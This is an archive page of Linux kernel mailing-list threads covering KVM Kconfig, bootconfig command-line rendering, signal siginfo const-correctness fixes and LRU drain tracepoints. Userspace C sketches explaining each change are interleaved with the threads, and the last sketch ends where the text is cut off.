Linux Trace Kernel


* Re: [PATCH v8 05/46] KVM: Make CONFIG_KVM_VM_MEMORY_ATTRIBUTES selectable
From: Sean Christopherson @ 2026-06-23  0:16 UTC
  To: Julian Braha
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	tabba, willy, wyihan, yan.y.zhao, forkloop, pratyush,
	suzuki.poulose, aneesh.kumar, liam, Paolo Bonzini,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers, Jonathan Corbet, Shuah Khan, Shuah Khan,
	Vishal Annapurve, Andrew Morton, Chris Li, Kairui Song,
	Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen, Yuanchu Xie,
	Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt, Kiryl Shutsemau,
	Baoquan He, Jason Gunthorpe, Vlastimil Babka, kvm, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest, linux-mm,
	linux-coco
In-Reply-To: <8e53844c-f2f8-4a4b-bf72-f3140c170d43@gmail.com>

On Fri, Jun 19, 2026, Julian Braha wrote:
> Hi Ackerley,
> 
> On 6/19/26 01:31, Ackerley Tng via B4 Relay wrote:
> 
> >  config KVM_VM_MEMORY_ATTRIBUTES
> > -	bool
> > +	depends on KVM_SW_PROTECTED_VM || KVM_INTEL_TDX || KVM_AMD_SEV
> > +	bool "Enable per-VM PRIVATE vs. SHARED attributes (for CoCo VMs)"
> 
> Sorry for the style nitpick, but could you keep the type and prompt as
> the first attribute in the Kconfig option definition (like the other
> options do)?

No need to be sorry, I've no idea why I put the "depends" first.  I don't even
know if that qualifies as a nit :-)

Ackerley, if you can provide your SoB (for Fuad's feedback), I can fix it up when
applying (assuming nothing else necessitates v9).


* Re: [PATCH v4 6/7] Documentation: bootconfig: document build-time cmdline rendering
From: Masami Hiramatsu @ 2026-06-23  0:11 UTC
  To: Breno Leitao
  Cc: Andrew Morton, Nathan Chancellor, paulmck, Nicolas Schier,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, linux-kernel, linux-trace-kernel, linux-kbuild,
	bpf, kernel-team
In-Reply-To: <ajkfTQwmmVo0DvFx@gmail.com>

Hi Breno,

On Mon, 22 Jun 2026 05:30:53 -0700
Breno Leitao <leitao@debian.org> wrote:

> On Thu, Jun 18, 2026 at 09:47:19AM +0900, Masami Hiramatsu wrote:
> > On Wed, 17 Jun 2026 02:56:23 -0700
> > Breno Leitao <leitao@debian.org> wrote:
> > 
> > > On Wed, Jun 10, 2026 at 07:58:10AM -0700, Breno Leitao wrote:
> > > > On Wed, Jun 10, 2026 at 11:37:20PM +0900, Masami Hiramatsu wrote:
> > > > > To avoid confusion, when this option is used, shouldn't we treat it
> > > > > the same way as if embedded command lines were enabled, and either
> > > > > not display it in /proc/bootconfig (or always display it, by merging
> > > > > the rendered string)?
> > > > 
> > > > You're right that EMBED_CMDLINE breaks it: the embedded kernel.* keys
> > > > are already in boot_command_line before setup_boot_config() ever sees
> > > > the initrd bconf, so a user reading /proc/bootconfig would see only
> > > > the initrd keys while parse_early_param() acted on the embedded ones.
> > > > That's exactly the split-state Sashiko was circling around.
> > > > 
> > > > Both options you suggest work for me, but they pull in opposite
> > > > directions and I'd rather not guess wrong on the user-facing
> > > > contract.  Which do you prefer for v5?
> > > > 
> > > >   (a) Don't display embedded in /proc/bootconfig -- keep the current
> > > >       "file shows the active bootconfig source" behavior and document
> > > >       that with EMBED_CMDLINE=y, the kernel.* subtree may have been
> > > >       applied separately via the cmdline.
> > > > 
> > > >   (b) Always display embedded by merging the rendered string into
> > > >       /proc/bootconfig when EMBED_CMDLINE=y, so the file reflects
> > > >       what was actually applied.
> > > > 
> > > > Happy to go either way
> > > 
> > > Following up on my own mail rather than leaving it fully open: after
> > > looking at the code more, I'd like to recommend (a).
> > 
> > Agreed. Sorry for replying late.
> 
> No problem, thanks. Quick heads-up: v5 already went out and crossed with
> this mail. It takes (a) and extends bootconfig.rst to walk through the
> four sources (bootloader cmdline, embedded cmdline, initrd bootconfig,
> embedded bootconfig), so that part is already in flight:
> 
>   https://lore.kernel.org/r/20260617-bootconfig_using_tools-v5-0-fd589a9cc5e3@debian.org
> 
> The naming/mutual-exclusion rework below I'll fold into v6.

Yeah, thanks for updating!

> 
> > Indeed. So I think this EMBED_CMDLINE is more like a CMDLINE set by a
> > bootconfig file than an embedded string. That is useful for reusing
> > the boot options. We need to change the explanation and clarify it.
> 
> Agreed, that's a much clearer model. v6 will reframe the Kconfig help and
> bootconfig.rst around "this is CONFIG_CMDLINE, sourced from a bootconfig
> file at build time" rather than "an embedded bootconfig that also feeds
> the cmdline".

Nice!

> 
> It also matches what the code already does precedence-wise: the rendered
> "kernel" string is prepended to boot_command_line in setup_arch(), so it
> sits in front of the bootloader args and parse_args() last-wins lets the
> bootloader override it -- i.e. exactly CONFIG_CMDLINE without _OVERRIDE.
> So this is mostly a rename + dependency + docs change, not a behavioral
> one. (A _FORCE/_EXTEND-style variant could come later if there's demand;
> the current behavior is the plain "overridable default" one.)

OK. Yeah, as a first step, I think the current behavior is enough.
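
The precedence described above (rendered "kernel" string prepended to
boot_command_line, last occurrence of a key wins) can be modelled in a few
lines of userspace C. This is only a simplified sketch: build_cmdline() and
lookup_last() are hypothetical helpers, not kernel functions; the kernel does
the real work in setup_arch() and parse_args().

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical model: the effective command line is the build-time
 * rendered string followed by the bootloader arguments.
 */
static void build_cmdline(char *out, size_t len, const char *rendered,
			  const char *bootloader)
{
	if (rendered[0] && bootloader[0])
		snprintf(out, len, "%s %s", rendered, bootloader);
	else
		snprintf(out, len, "%s%s", rendered, bootloader);
}

/*
 * Copy the value of the last "key=value" token into val. Scanning left to
 * right and overwriting on every match gives last-wins semantics, so a
 * bootloader argument overrides the same key from the rendered prefix.
 * Returns 1 if the key was found, 0 otherwise.
 */
static int lookup_last(const char *cmdline, const char *key, char *val,
		       size_t len)
{
	size_t klen = strlen(key);
	const char *p = cmdline;
	int found = 0;

	while (*p) {
		const char *end;
		size_t tlen;

		while (*p == ' ')	/* skip separators */
			p++;
		if (!*p)
			break;
		end = strchr(p, ' ');
		tlen = end ? (size_t)(end - p) : strlen(p);

		if (tlen > klen && !strncmp(p, key, klen) && p[klen] == '=') {
			size_t vlen = tlen - klen - 1;

			if (vlen >= len)
				vlen = len - 1;
			memcpy(val, p + klen + 1, vlen);
			val[vlen] = '\0';
			found = 1;
		}
		p += tlen;
	}
	return found;
}
```

With "loglevel=4 quiet" rendered at build time and "loglevel=7" from the
bootloader, lookup_last() yields "7": the bootloader wins, which is the plain
CONFIG_CMDLINE-without-_OVERRIDE behavior discussed here.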

> 
> > Thus we should make those configs mutually exclusive. If the user already
> > sets CONFIG_CMDLINE, EMBED_CMDLINE should not be enabled.
> 
> Makes sense -- two built-in cmdline sources at once is confusing. I'll
> make them mutually exclusive in v6. I'm thinking:
> 
>   depends on CMDLINE = ""
> 
> on the new symbol. On x86 CONFIG_CMDLINE is a string that depends on
> CMDLINE_BOOL and defaults to "", so this reads as "only offer the
> bootconfig-rendered cmdline when no static CONFIG_CMDLINE is configured",
> and it works the same on other arches that define CMDLINE as a string.
> Does that match what you had in mind, or would you rather gate it the
> other way (CMDLINE depends on !the-new-symbol)?

No, this looks good and clear enough to me.

> 
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it may be natural to call it CONFIG_CMDLINE_BOOT_CONFIG.
> > In this case, we render the cmdline string from bootconfig at build time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> 
> I'll rename it for v6. One nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG would
> pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG.

Yeah, thanks!

> 
> Another nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG would
> pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG unless you'd
> rather keep CONFIG_CMDLINE_BOOT_CONFIG -- either is fine by me.

I think it should use the same pattern to avoid confusion.

> 
> One clarification on "set CONFIG_CMDLINE with the rendered string":
> CONFIG_CMDLINE is a Kconfig string fixed when .config is read, while the
> render happens later during the build, so we can't literally store the
> rendered text into CONFIG_CMDLINE. The mechanism stays "render into
> .init.rodata, merge into boot_command_line in setup_arch()"; what changes
> is how we name and document it, plus the mutual exclusion above. Let me

Yes, that is fine with me because it does not change the current behavior.

> 
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it may be natural to call it CONFIG_CMDLINE_BOOT_CONFIG.
> 
> I'll rename it for v6. One nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG
> would pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG

Yes, it is better to rename it.

> > In this case, we render the cmdline string from bootconfig build-time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> 
> CONFIG_CMDLINE is a Kconfig string fixed when .config is read, while the
> render happens later during the build, so we can't literally store the
> rendered text into CONFIG_CMDLINE. Let me know if you can envision a way to
> get it done.

Ah, OK. Never mind; as long as it is shown in /proc/cmdline, I think it is OK.
(BTW, if we use the embedded bootconfig, the file path is shown in
 /proc/config.gz; maybe I need to mention it.)

> > I think we can proceed without rendering it in /proc/bootconfig
> > at this point. Later, once we find a way to detect early parameters
> > correctly, we can fix it.
> 
> Sounds good. I'll document the sharp edge (with both an embedded cmdline and an
> initrd bootconfig, early params reflect the embedded values because the initrd
> isn't parsed yet) and leave the early-param-aware override detection as the
> follow-up you describe.

Thanks for documenting it :)

> 
> > (BTW, the early parameter problem is a bit complicated. It is not hard
> > to distinguish early parameters, but the kernel accepts the same key
> > for both early and normal parameters, e.g. "console=")
> 
> Right, console= being both is the awkward case. Agreed that's better as
> its own series once we have a reliable way to detect early params.
> 
> So the v6 plan:
>   - rename CONFIG_BOOT_CONFIG_EMBED_CMDLINE -> CONFIG_CMDLINE_FROM_BOOTCONFIG
>     (or _BOOT_CONFIG, your call)
>   - make it mutually exclusive with CONFIG_CMDLINE (depends on CMDLINE = "")
>   - reframe the Kconfig help + bootconfig.rst as "CONFIG_CMDLINE from a
>     bootconfig file"
>   - keep (a): no rendering in /proc/bootconfig; document the early-param
>     sharp edge
>   - defer early-param-aware override detection to a follow-up
> 
> Thanks for the direction,

Thanks for working on this feature!

Thank you,

> --breno
> 


-- 
Masami Hiramatsu (Google) <mhiramat@kernel.org>


* [PATCH v2 2/2] signal: make send_signal_locked() take const siginfo
From: Bradley Morgan @ 2026-06-22 20:25 UTC
  To: Oleg Nesterov, Christian Brauner
  Cc: Steven Rostedt, Masami Hiramatsu, Mathieu Desnoyers,
	Andrew Morton, Peter Zijlstra, Marco Elver, Aleksandr Nogikh,
	Thomas Gleixner, Adrian Huang, Kexin Sun, linux-kernel,
	linux-trace-kernel, Bradley Morgan
In-Reply-To: <20260622164029.11474-1-include@grrlz.net>

send_signal_locked() should not modify the caller's siginfo. Make that
part of the type by taking it as const, and apply the namespace rewrite
only to the local copy.

Suggested-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Bradley Morgan <include@grrlz.net>
---
Changes since v1:
- New patch from Oleg's suggestion.
- Link to Oleg's suggestion:
  https://lore.kernel.org/all/0873AC4A-3CB2-4F7B-BFE6-75D855AD22DC@grrlz.net/T/#m5f8a2d54928efff41de539969b68149e1ec5fca4

 include/linux/signal.h        |  2 +-
 include/trace/events/signal.h |  4 ++--
 kernel/signal.c               | 20 +++++++++++---------
 3 files changed, 14 insertions(+), 12 deletions(-)

diff --git a/include/linux/signal.h b/include/linux/signal.h
index f19816832f05..a1ba8c5973c6 100644
--- a/include/linux/signal.h
+++ b/include/linux/signal.h
@@ -283,7 +283,7 @@ extern int do_send_sig_info(int sig, struct kernel_siginfo *info,
 				struct task_struct *p, enum pid_type type);
 extern int group_send_sig_info(int sig, struct kernel_siginfo *info,
 			       struct task_struct *p, enum pid_type type);
-extern int send_signal_locked(int sig, struct kernel_siginfo *info,
+extern int send_signal_locked(int sig, const struct kernel_siginfo *info,
 			      struct task_struct *p, enum pid_type type);
 extern int sigprocmask(int, sigset_t *, sigset_t *);
 extern void set_current_blocked(sigset_t *);
diff --git a/include/trace/events/signal.h b/include/trace/events/signal.h
index 1db7e4b07c01..05a46135ee34 100644
--- a/include/trace/events/signal.h
+++ b/include/trace/events/signal.h
@@ -49,8 +49,8 @@ enum {
  */
 TRACE_EVENT(signal_generate,
 
-	TP_PROTO(int sig, struct kernel_siginfo *info, struct task_struct *task,
-			int group, int result),
+	TP_PROTO(int sig, const struct kernel_siginfo *info,
+		 struct task_struct *task, int group, int result),
 
 	TP_ARGS(sig, info, task, group, result),
 
diff --git a/kernel/signal.c b/kernel/signal.c
index d72d9be3a992..26e8b8e1d03c 100644
--- a/kernel/signal.c
+++ b/kernel/signal.c
@@ -1037,7 +1037,7 @@ static inline bool legacy_queue(struct sigpending *signals, int sig)
 	return (sig < SIGRTMIN) && sigismember(&signals->signal, sig);
 }
 
-static int __send_signal_locked(int sig, struct kernel_siginfo *info,
+static int __send_signal_locked(int sig, const struct kernel_siginfo *info,
 				struct task_struct *t, enum pid_type type, bool force)
 {
 	struct sigpending *pending;
@@ -1154,7 +1154,7 @@ static int __send_signal_locked(int sig, struct kernel_siginfo *info,
 	return ret;
 }
 
-static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
+static inline bool has_si_pid_and_uid(const struct kernel_siginfo *info)
 {
 	bool ret = false;
 	switch (siginfo_layout(info->si_signo, info->si_code)) {
@@ -1178,10 +1178,11 @@ static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
 	return ret;
 }
 
-int send_signal_locked(int sig, struct kernel_siginfo *info,
+int send_signal_locked(int sig, const struct kernel_siginfo *info,
 		       struct task_struct *t, enum pid_type type)
 {
 	struct kernel_siginfo rewritten;
+	const struct kernel_siginfo *send_info = info;
 	/* Should SIGKILL or SIGSTOP be received by a pid namespace init? */
 	bool force = false;
 
@@ -1196,26 +1197,27 @@ int send_signal_locked(int sig, struct kernel_siginfo *info,
 		struct user_namespace *t_user_ns;
 
 		rewritten = *info;
-		info = &rewritten;
+		send_info = &rewritten;
 
 		rcu_read_lock();
 		t_user_ns = task_cred_xxx(t, user_ns);
 		if (current_user_ns() != t_user_ns) {
-			kuid_t uid = make_kuid(current_user_ns(), info->si_uid);
-			info->si_uid = from_kuid_munged(t_user_ns, uid);
+			kuid_t uid = make_kuid(current_user_ns(), rewritten.si_uid);
+
+			rewritten.si_uid = from_kuid_munged(t_user_ns, uid);
 		}
 		rcu_read_unlock();
 
 		/* A kernel generated signal? */
-		force = (info->si_code == SI_KERNEL);
+		force = (rewritten.si_code == SI_KERNEL);
 
 		/* From an ancestor pid namespace? */
 		if (!task_pid_nr_ns(current, task_active_pid_ns(t))) {
-			info->si_pid = 0;
+			rewritten.si_pid = 0;
 			force = true;
 		}
 	}
-	return __send_signal_locked(sig, info, t, type, force);
+	return __send_signal_locked(sig, send_info, t, type, force);
 }
 
 static void print_fatal_signal(int signr)
-- 
2.53.0
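
A minimal userspace sketch of the pattern this patch adopts: the pointer
passed in by the caller is const, and the per-recipient rewrite goes into a
local copy that a second const pointer (send_info) is redirected to.
struct demo_siginfo, deliver() and send_one() are hypothetical stand-ins for
kernel_siginfo, __send_signal_locked() and send_signal_locked().

```c
#include <assert.h>

/* Hypothetical stand-in for struct kernel_siginfo (only the fields used). */
struct demo_siginfo {
	int si_code;
	int si_pid;
	int si_uid;
};

/* Stand-in for __send_signal_locked(): records what would be queued. */
static struct demo_siginfo delivered;

static int deliver(const struct demo_siginfo *info)
{
	delivered = *info;
	return 0;
}

/*
 * Same shape as the patched send_signal_locked(): info is const, so the
 * compiler rejects any write through it; the rewrite goes into a local
 * copy and send_info is pointed at that copy.
 */
static int send_one(const struct demo_siginfo *info, int needs_rewrite,
		    int target_uid, int sender_visible)
{
	struct demo_siginfo rewritten;
	const struct demo_siginfo *send_info = info;

	if (needs_rewrite) {
		rewritten = *info;
		send_info = &rewritten;
		rewritten.si_uid = target_uid;
		if (!sender_visible)
			rewritten.si_pid = 0;
	}
	/* "info->si_uid = target_uid;" would fail to compile here. */
	return deliver(send_info);
}
```

When no rewrite is needed, send_info simply aliases the caller's siginfo, so
the common path costs no copy.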


* [PATCH v2 1/2] signal: avoid shared siginfo namespace rewrites
From: Bradley Morgan @ 2026-06-22 20:25 UTC
  To: Oleg Nesterov, Christian Brauner
  Cc: Steven Rostedt, Masami Hiramatsu, Mathieu Desnoyers,
	Andrew Morton, Peter Zijlstra, Marco Elver, Aleksandr Nogikh,
	Thomas Gleixner, Adrian Huang, Kexin Sun, linux-kernel,
	linux-trace-kernel, Bradley Morgan, stable
In-Reply-To: <20260622164029.11474-1-include@grrlz.net>

send_signal_locked() rewrites the sender IDs (si_uid, si_pid) for the
target's namespaces. Group sends reuse the same siginfo for every
recipient, so the rewrite done for one recipient can affect the next.

Copy the siginfo before changing it.

Fixes: 7a0cf094944e ("signal: Correct namespace fixups of si_pid and si_uid")
Cc: stable@vger.kernel.org
Signed-off-by: Bradley Morgan <include@grrlz.net>
---
Changes since v1:
- No code changes in this patch.
- Add patch 2 for Oleg's const suggestion.
- Link to v1:
  https://lore.kernel.org/all/0873AC4A-3CB2-4F7B-BFE6-75D855AD22DC@grrlz.net/T/#m89955d13f10807c316d34cc76680d690a2d95b31

 kernel/signal.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/kernel/signal.c b/kernel/signal.c
index b9fc7be1a169..d72d9be3a992 100644
--- a/kernel/signal.c
+++ b/kernel/signal.c
@@ -1181,6 +1181,7 @@ static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
 int send_signal_locked(int sig, struct kernel_siginfo *info,
 		       struct task_struct *t, enum pid_type type)
 {
+	struct kernel_siginfo rewritten;
 	/* Should SIGKILL or SIGSTOP be received by a pid namespace init? */
 	bool force = false;
 
@@ -1194,6 +1195,9 @@ int send_signal_locked(int sig, struct kernel_siginfo *info,
 		/* SIGKILL and SIGSTOP is special or has ids */
 		struct user_namespace *t_user_ns;
 
+		rewritten = *info;
+		info = &rewritten;
+
 		rcu_read_lock();
 		t_user_ns = task_cred_xxx(t, user_ns);
 		if (current_user_ns() != t_user_ns) {
-- 
2.53.0
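
The bug being fixed can be reproduced in a toy model. Here a uid
"namespace" is just an integer base (an assumption for illustration; real
user namespaces use extent maps), and the hypothetical translate_uid() plays
the role of make_kuid() followed by from_kuid_munged(). Rewriting the shared
siginfo in place makes the second recipient translate an already-translated
uid; rewriting a copy does not.

```c
#include <assert.h>

/* Hypothetical stand-in for the one kernel_siginfo field that matters here. */
struct grp_siginfo {
	int si_uid;
};

/*
 * Toy uid namespaces: each namespace is an integer base. The first step is
 * like make_kuid() (sender's view -> global), the second like
 * from_kuid_munged() (global -> target's view), without the munging.
 */
static int translate_uid(int uid, int sender_base, int target_base)
{
	int kuid = uid + sender_base;

	return kuid - target_base;
}

/* Pre-fix shape: the rewrite lands in the siginfo shared by the group. */
static int deliver_in_place(struct grp_siginfo *info, int sender_base,
			    int target_base)
{
	info->si_uid = translate_uid(info->si_uid, sender_base, target_base);
	return info->si_uid;
}

/* Fixed shape: each recipient gets its own rewritten copy. */
static int deliver_copy(const struct grp_siginfo *info, int sender_base,
			int target_base)
{
	struct grp_siginfo rewritten = *info;

	rewritten.si_uid = translate_uid(rewritten.si_uid, sender_base,
					 target_base);
	return rewritten.si_uid;
}
```

With a sender uid of 1000 and two recipients whose bases are 500 and 200,
the in-place version hands the second recipient 300 instead of 800; the
copying version yields 500 and 800 and leaves the caller's siginfo intact.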


* Re: [PATCH v3 5/7] kernel: Use mutable list iterators
From: Eduard Zingerman @ 2026-06-22 19:03 UTC
  To: Kaitao Cheng, Paul Moore, Eric Paris, Alexei Starovoitov,
	Daniel Borkmann, Andrii Nakryiko, Kumar Kartikeya Dwivedi,
	David S. Miller, Jakub Kicinski, Jesper Dangaard Brouer,
	John Fastabend, Tejun Heo, Johannes Weiner, Michal Koutný,
	Maarten Lankhorst, Maxime Ripard, Natalie Vock, Peter Zijlstra,
	Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
	Masami Hiramatsu, Oleg Nesterov, Peter Oberparleiter,
	Andrew Morton, Baoquan He, Mike Rapoport, Pasha Tatashin,
	Pratyush Yadav, Naveen N Rao, Josh Poimboeuf, Jiri Kosina,
	Miroslav Benes, Petr Mladek, Will Deacon, Boqun Feng,
	Luis Chamberlain, Petr Pavlu, Daniel Gomez, Sami Tolvanen,
	Steffen Klassert, Daniel Jordan, Rafael J. Wysocki,
	Davidlohr Bueso, Paul E. McKenney, Josh Triplett,
	Frederic Weisbecker, Neeraj Upadhyay, Joel Fernandes,
	Uladzislau Rezki, Juri Lelli, Vincent Guittot, Kees Cook,
	Balbir Singh, Anna-Maria Behnsen, Thomas Gleixner, John Stultz,
	KP Singh, Matt Bobrowski, Nathan Chancellor, Martin KaFai Lau,
	Song Liu, Mark Rutland, Mathieu Desnoyers, Dietmar Eggemann,
	David Vernet, Steven Rostedt
  Cc: audit, linux-kernel, bpf, netdev, cgroups, dri-devel,
	linux-perf-users, linux-trace-kernel, kexec, live-patching,
	linux-modules, linux-crypto, linux-pm, rcu, sched-ext, llvm,
	Kaitao Cheng
In-Reply-To: <20260622042811.31684-1-kaitao.cheng@linux.dev>

On Mon, 2026-06-22 at 12:28 +0800, Kaitao Cheng wrote:
> From: Kaitao Cheng <chengkaitao@kylinos.cn>
> 
> The safe list iteration helpers require callers to provide a temporary
> cursor even when the cursor is only used internally by the loop. This
> leaves many functions with otherwise unused variables whose only purpose
> is to satisfy the old iterator interface.
> 
> Use the mutable list iteration helpers for those cases. The mutable
> helpers keep the same removal-safe traversal semantics, while allowing
> the temporary cursor to be internal to the macro when the caller does
> not need to observe it.
> 
> Convert list, hlist and llist users under kernel/ where the temporary
> cursor is not used outside the iteration. Keep the explicit cursor form
> where the next entry is still needed by the surrounding code.
> 
> No functional change intended.
> 
> Signed-off-by: Kaitao Cheng <chengkaitao@kylinos.cn>
> ---

Besides the fact that this does not apply,
I don't see why this is needed for the BPF sub-tree.

[...]
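
For context, the difference between the two iterator styles discussed in the
quoted commit message can be sketched on a toy list. for_each_safe() follows
the list_for_each_safe(pos, n, head) shape, where the caller declares the
temporary cursor; for_each_internal() is a hypothetical macro that declares
the saved next pointer inside the for statement. Neither is the actual macro
from the series, whose names and implementation are not shown here.

```c
#include <assert.h>
#include <stdlib.h>

/* Minimal circular doubly linked list, loosely modelled on <linux/list.h>. */
struct node {
	struct node *prev, *next;
	int val;
};

static void node_list_init(struct node *head)
{
	head->prev = head->next = head;
}

static void node_add_tail(struct node *n, struct node *head)
{
	n->prev = head->prev;
	n->next = head;
	head->prev->next = n;
	head->prev = n;
}

static void node_del(struct node *n)
{
	n->prev->next = n->next;
	n->next->prev = n->prev;
}

/* Caller-provided cursor, same shape as list_for_each_safe(pos, n, head). */
#define for_each_safe(pos, n, head)					\
	for ((pos) = (head)->next, (n) = (pos)->next; (pos) != (head);	\
	     (pos) = (n), (n) = (pos)->next)

/*
 * Hypothetical internal-cursor variant: the saved next pointer is declared
 * in the for statement. A real macro would need a unique name for it so
 * that nested loops do not shadow each other.
 */
#define for_each_internal(pos, head)					\
	for (struct node *next_ = ((pos) = (head)->next)->next;		\
	     (pos) != (head); (pos) = next_, next_ = (pos)->next)

/* Build a list holding 1..count. */
static void fill(struct node *head, int count)
{
	node_list_init(head);
	for (int i = 1; i <= count; i++) {
		struct node *n = malloc(sizeof(*n));

		assert(n);
		n->val = i;
		node_add_tail(n, head);
	}
}

/* Delete even entries; n exists only to satisfy the macro. */
static void drop_even_safe(struct node *head)
{
	struct node *pos, *n;

	for_each_safe(pos, n, head) {
		if (pos->val % 2 == 0) {
			node_del(pos);
			free(pos);
		}
	}
}

/* Same deletion, with no extra cursor variable in the caller. */
static void drop_even_internal(struct node *head)
{
	struct node *pos;

	for_each_internal(pos, head) {
		if (pos->val % 2 == 0) {
			node_del(pos);
			free(pos);
		}
	}
}

static int sum(const struct node *head)
{
	int s = 0;

	for (const struct node *p = head->next; p != head; p = p->next)
		s += p->val;
	return s;
}
```

Both loops stay removal-safe because the next pointer is saved before the
body frees pos; the only difference is who owns that saved pointer.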


* [PATCH v5] mm/lruvec: trace LRU add drains and drain-all requests
From: JP Kobryn @ 2026-06-22 18:51 UTC
  To: linux-mm, willy, shakeel.butt, usama.arif, akpm, vbabka, mhocko,
	rostedt, mhiramat, mathieu.desnoyers, kasong, qi.zheng, baohua,
	axelrasmussen, yuanchu, weixugc, chrisl, shikemeng, nphamcs,
	baoquan.he, youngjun.park
  Cc: linux-kernel, linux-trace-kernel

LRU add batches can be drained before they reach capacity. This can be a
source of LRU lock contention, but it is not currently possible to
attribute these drains to callers with existing tracepoints.

Add mm_lru_add_drain to report the CPU and lru_add batch count when an
lru_add batch is drained. This allows tracing to distinguish full drains
from partial drains and attribute them to the calling stack.

Add mm_lru_add_drain_all to capture callers of __lru_add_drain_all and
whether they set the force flag for all CPUs. The tracepoint mirrors the
signature of the enclosing function, but is still needed because that
function is static inline and may be inlined into its callers.

Note that DECLARE_TRACE() is used for these new trace hooks to avoid
creating a new trace event ABI.

Signed-off-by: JP Kobryn <jp.kobryn@linux.dev>
Reviewed-by: Barry Song <baohua@kernel.org>
Acked-by: Shakeel Butt <shakeel.butt@linux.dev>
---
v5:
  - change from trace events to bare trace hooks

v4: https://lore.kernel.org/linux-mm/20260610234808.212397-1-jp.kobryn@linux.dev/
  - renamed nr_folio_add to nr_folios in lru_add_drain()
  - renamed nr to nr_folios in tracepoint for consistency

v3: https://lore.kernel.org/linux-mm/20260610195220.12403-1-jp.kobryn@linux.dev/
  - restored and renamed tracepoint in __lru_add_drain_all

v2: https://lore.kernel.org/linux-mm/20260609041156.31127-1-jp.kobryn@linux.dev/
  - removed mm_lru_drain_all tracepoint

v1: https://lore.kernel.org/linux-mm/20260609041156.31127-1-jp.kobryn@linux.dev/

 include/trace/events/pagemap.h | 8 ++++++++
 mm/swap.c                      | 7 ++++++-
 2 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/include/trace/events/pagemap.h b/include/trace/events/pagemap.h
index 171524d3526d..36c3a90f0acc 100644
--- a/include/trace/events/pagemap.h
+++ b/include/trace/events/pagemap.h
@@ -77,6 +77,14 @@ TRACE_EVENT(mm_lru_activate,
 	TP_printk("folio=%p pfn=0x%lx", __entry->folio, __entry->pfn)
 );
 
+DECLARE_TRACE(mm_lru_add_drain,
+	      TP_PROTO(int cpu, unsigned int nr_folios),
+	      TP_ARGS(cpu, nr_folios));
+
+DECLARE_TRACE(mm_lru_add_drain_all,
+	      TP_PROTO(bool force_all_cpus),
+	      TP_ARGS(force_all_cpus));
+
 #endif /* _TRACE_PAGEMAP_H */
 
 /* This part must be outside protection */
diff --git a/mm/swap.c b/mm/swap.c
index 588f50d8f1a8..460e56370b3c 100644
--- a/mm/swap.c
+++ b/mm/swap.c
@@ -694,9 +694,12 @@ void lru_add_drain_cpu(int cpu)
 {
 	struct cpu_fbatches *fbatches = &per_cpu(cpu_fbatches, cpu);
 	struct folio_batch *fbatch = &fbatches->lru_add;
+	unsigned int nr_folios = folio_batch_count(fbatch);
 
-	if (folio_batch_count(fbatch))
+	if (nr_folios) {
 		folio_batch_move_lru(fbatch, lru_add);
+		trace_mm_lru_add_drain_tp(cpu, nr_folios);
+	}
 
 	fbatch = &fbatches->lru_move_tail;
 	/* Disabling interrupts below acts as a compiler barrier. */
@@ -869,6 +872,8 @@ static inline void __lru_add_drain_all(bool force_all_cpus)
 	if (WARN_ON(!mm_percpu_wq))
 		return;
 
+	trace_mm_lru_add_drain_all_tp(force_all_cpus);
+
 	/*
 	 * Guarantee folio_batch counter stores visible by this CPU
 	 * are visible to other CPUs before loading the current drain
-- 
2.54.0
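
As a rough illustration of how the new hook's arguments could be consumed,
the sketch below models the patched lru_add_drain_cpu() path and a probe that
counts full versus partial drains. DEMO_BATCH_CAPACITY is an assumed value,
and drain_cpu()/on_lru_add_drain() are hypothetical; in the kernel a probe
would be attached to the mm_lru_add_drain tracepoint rather than called
directly.

```c
#include <assert.h>

/* Assumed batch capacity for the sketch; not taken from the kernel. */
#define DEMO_BATCH_CAPACITY 31

/* What a consumer attached to the hook might aggregate. */
struct drain_stats {
	unsigned long full;
	unsigned long partial;
};

/*
 * Hypothetical probe body. The hook only reports (cpu, nr_folios);
 * comparing nr_folios with the capacity tells full drains from early ones.
 */
static void on_lru_add_drain(struct drain_stats *st, int cpu,
			     unsigned int nr_folios)
{
	(void)cpu;	/* a real consumer might keep per-CPU counts */
	if (nr_folios >= DEMO_BATCH_CAPACITY)
		st->full++;
	else
		st->partial++;
}

/*
 * Model of the patched lru_add_drain_cpu(): read the count once, and fire
 * the hook only for a non-empty batch, after it has been moved to the LRU.
 */
static void drain_cpu(struct drain_stats *st, int cpu, unsigned int *count)
{
	unsigned int nr_folios = *count;

	if (nr_folios) {
		*count = 0;	/* stands in for folio_batch_move_lru() */
		on_lru_add_drain(st, cpu, nr_folios);
	}
}
```

Reading the count into nr_folios before the move matters: after
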